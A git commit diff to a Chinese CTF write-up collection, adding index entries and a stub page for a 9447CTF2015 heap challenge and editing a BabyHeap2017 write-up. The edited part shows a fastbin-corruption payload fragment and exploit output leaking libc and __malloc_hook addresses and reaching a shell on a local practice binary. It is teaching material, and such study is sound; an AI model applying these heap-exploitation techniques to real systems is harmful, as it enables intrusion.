add 6.1.11

This commit is contained in:
firmianay 2018-01-10 20:55:34 +08:00
parent dc10687bc8
commit 7dc80c9097
6 changed files with 32 additions and 6 deletions

View File

@ -111,6 +111,7 @@
- [6.1.8 pwn DCTF2017 Flex](doc/6.1.8_pwn_dctf2017_flex.md)
- [6.1.9 pwn RHme3 Exploitation](doc/6.1.9_rhme3_exploitation.md)
- [6.1.10 pwn 0CTF2017 BabyHeap2017](doc/6.1.10_0ctf2017_babyheap2017.md)
- [6.1.11 pwn 9447CTF2015 Search-Engine](doc/6.1.11_9447ctf2015_search_engine.md)
- re
- [6.2.1 re XHPCTF2017 dont_panic](doc/6.2.1_re_xhpctf2017_dont_panic.md)
- [6.2.2 re ECTF2016 tayy](doc/6.2.2_re_ectf2016_tayy.md)

View File

@ -99,6 +99,7 @@ GitHub 地址https://github.com/firmianay/CTF-All-In-One
* [6.1.8 pwn DCTF2017 Flex](doc/6.1.8_pwn_dctf2017_flex.md)
* [6.1.9 pwn RHme3 Exploitation](doc/6.1.9_rhme3_exploitation.md)
* [6.1.10 pwn 0CTF2017 BabyHeap2017](doc/6.1.10_0ctf2017_babyheap2017.md)
* [6.1.11 pwn 9447CTF2015 Search-Engine](doc/6.1.11_9447ctf2015_search_engine.md)
* re
* [6.2.1 re XHPCTF2017 dont_panic](doc/6.2.1_re_xhpctf2017_dont_panic.md)
* [6.2.2 re ECTF2016 tayy](doc/6.2.2_re_ectf2016_tayy.md)

View File

@ -177,7 +177,7 @@ gef➤ x/20gx 0xafc966564d0-0x10
```
free 掉的 chunk其结构体被清空等待下一次 malloc并添加到空出来的地方。
通过溢出漏洞修改已被释放的 chunk 2让 fd 指针指向 chunk 4这样就将 small chunk 加入到了 fastbins 链表中,然后还需要把 chunk 4 的 0x91 改成 0x21 以绕过 fastbins 的检查:
通过溢出漏洞修改已被释放的 chunk 2让 fd 指针指向 chunk 4这样就将 small chunk 加入到了 fastbins 链表中,然后还需要把 chunk 4 的 0x91 改成 0x21 以绕过 fastbins 大小的检查:
```python
payload = "A"*16
payload += p64(0)
@ -526,16 +526,16 @@ gef➤ x/30gx 0xafc966564d0-0x10
0xafc966565a0: 0x0000000000000000 0x0000000000000000
```
最后,只要调用了 malloc就会触发 hook 函数,即 one-gadget。
最后,只要调用了 malloc就会触发 hook 函数,即 one-gadget。现在可以开启 ASLR 了,因为通过泄漏 libc 地址,我们已经完全绕过了它。
Bingo!!!
```
$ python exp.py
[+] Opening connection to 127.0.0.1 on port 10001: Done
[*] leak => 0x7ffff7dd1b78
[*] libc => 0x7ffff7a0d000
[*] __malloc_hook => 0x7ffff7dd1b10
[*] one_gadget => 0x7ffff7a5226a
[*] leak => 0x7f8c1be9eb78
[*] libc => 0x7f8c1bada000
[*] __malloc_hook => 0x7f8c1be9eb10
[*] one_gadget => 0x7f8c1bb1f26a
[*] Switching to interactive mode
$ whoami
firmy

View File

@ -0,0 +1,23 @@
# 6.1.11 pwn 9447CTF2015 Search-Engine
- [题目复现](#题目复现)
- [题目解析](#题目解析)
- [参考资料](#参考资料)
[下载文件](../src/writeup/6.1.11_9447ctf2015_search_engine)
## 题目复现
```
$ file search
search: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.24, BuildID[sha1]=4f5b70085d957097e91f940f98c0d4cc6fb3343f, stripped
$ checksec -f search
RELRO STACK CANARY NX PIE RPATH RUNPATH FORTIFY Fortified Fortifiable FILE
Partial RELRO Canary found NX enabled No PIE No RPATH No RUNPATH Yes 1 3 search
```
## 题目解析
## 参考资料
- [how2heap](https://github.com/shellphish/how2heap)

View File

@ -11,6 +11,7 @@
- [6.1.8 pwn DCTF2017 Flex](6.1.8_pwn_dctf2017_flex.md)
- [6.1.9 pwn RHme3 Exploitation](6.1.9_rhme3_exploitation.md)
- [6.1.10 pwn 0CTF2017 BabyHeap2017](6.1.10_0ctf2017_babyheap2017.md)
- [6.1.11 pwn 9447CTF2015 Search-Engine](6.1.11_9447ctf2015_search_engine.md)
- re
- [6.2.1 re XHPCTF2017 dont_panic](6.2.1_re_xhpctf2017_dont_panic.md)
- [6.2.2 re ECTF2016 tayy](6.2.2_re_ectf2016_tayy.md)

Binary file not shown.